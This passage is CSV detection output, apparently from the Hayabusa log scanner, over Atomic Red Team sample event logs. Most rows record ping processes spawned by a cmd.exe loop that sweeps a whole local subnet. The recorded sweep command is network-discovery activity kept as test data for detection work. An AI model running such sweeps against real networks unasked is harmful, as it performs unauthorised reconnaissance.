-n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.926 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.517 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.539 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
